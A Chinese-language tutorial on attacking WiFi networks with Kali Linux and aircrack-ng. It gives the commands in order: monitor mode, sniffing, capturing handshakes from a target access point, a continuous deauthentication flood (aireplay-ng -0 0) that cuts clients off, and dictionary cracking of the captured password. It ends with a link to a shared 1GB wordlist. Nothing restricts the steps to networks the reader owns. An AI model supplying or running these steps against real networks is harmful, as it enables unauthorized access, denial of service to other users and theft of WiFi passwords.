kali linux 无线渗透[aircrack-ng]及问题解决

首先：你要有一个兼容kali linux的无线网卡用于嗅探网络

如我的是：RT3070（免驱）

注：kali linux系统不能使用物理主机上的网卡

1.显示或配置网络设备(网络接口卡)

ifconfig 

注：网卡信息配置：/etc/network/interfaces

auto lo # auto表示开机启动该网卡设备
iface lo inet loopback
auto eth0 # 使用dhcp分配地址
iface eth0 inet dhcp iface
eth0 inet6 auto auto eth1 # 使用静态地址
iface eth1 inet static
address 192.168.1.2/24
gateway 192.168.1.1 （注：netstat -rn 查看网关地址）

注：虚拟机打开后，主机无法上网

给无线网卡设置静态地址时不要设置有可能与其他设备冲突的ip地址，冲突情况：在没虚拟机时，主机重新连接无线路由，路由使用dhcp分配地址给主机(恰好与虚拟机配置的网卡地址冲突)，当打开虚拟机时，就会两机无法上网。

2.无线网络设备信息，查看无线网卡的状态的是否为监听状态 

iwconfig 

3.查看所有影响到aircrack-ng工作的进程 

airmon-ng check 

4.结束所有影响到aircrack-ng工作的进程 

airmon-ng check kill 

 5.无线网卡wlan0进入监听状态

airmon-ng start wlan0 

 6.wifi嗅探

airodump-ng wlan0mon 

 6.wifi嗅探后会出现以下列表

（注：若不出嗅探信息，1.airmon-ng stop wlan0mon  2.airmon-ng start wlan0 3.service network-manager start）

BSSID：   接入点的MAC地址

PWR       网卡反馈的信号水平，它的数值是驱动决定的，PWR是-1，则表示驱动不支持信号水平

Beacons： 接入点发出的公告报文的数量，每个接入点每秒大概发送10个公告包（以最低的速率1M）

Data：    捕捉到的数据包的数量

/s：      过去10秒每秒接收到的数据包数量

CH：      无线信道（从beacon包中得到）

MB：      接入点支持的最大速度。

ENC：     表示使用的加密算法。

CIPHER：  检测出的密码体系，CCMP,WRAP,TKIP,WEP,WEP40和WEP104中的一种。

AUTH：    使用的认证协议。GMT（WPA/WPA2 使用单独的认证服务器），SKA（WEP共享密钥） ，PSK（WPA/WPA2 预共享密钥），或者OPN（WEP开放认证）

ESSID：   无线网络名称。

7.开始抓包 

root@kali:~# airodump-ng -c 1 --bssid AA:BB:CC:DD:EE:FF -w /root/桌面/sonofbitch/ wlan0mon

 -c ：选择信道
-w ：抓到的包存放的目录（注：pwd查看当前目录）

8.进行洪泛攻击，可以理解为你设备与wifi的信道被塞满
（注：多次洪泛攻击才可以找到相应的信道进行攻击）

aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF -c GG:HH:II:JJ:KK:LL wlanOmon

Attack modes (numbers can still be used): //攻击模式(数字仍然可以使用)

--deauth count : deauthenticate 1 or all stations (-0) //解除一个或者全部站的连接

--fakeauth delay : fake authentication with AP (-1) //对AP进行伪连接攻击

--interactive : interactive frame selection (-2) //交互注入攻击

--arpreplay : standard ARP-request replay (-3) //标准Arp请求包重放攻击

--chopchop : decrypt/chopchop WEP packet (-4) //解码或断续WEP数据包攻击

--fragment : generates valid keystream (-5) //产生合法密钥流 -

【-0】：冲突攻击模式，后面跟发送次数（设置为 0，则为循环攻击，不停的断开连接，客户端无法正常上网）
【-a】：设置 ap 的 mac
【-c】：设置已连接的合法客户端的 mac。
如果不设置-c，则断开所有和 ap 连接的合法客户端。 

9.跑包（注：跑包效率取决电脑性能，字典和运气）

aircrack-ng -w /root/桌面/wordlist.txt /root/桌面/sonofbitch/-01.cap

分享自家用1G字典：https://pan.baidu.com/s/1U0UWW7Qf64Z1XcaMsum-Bw 密码：nonp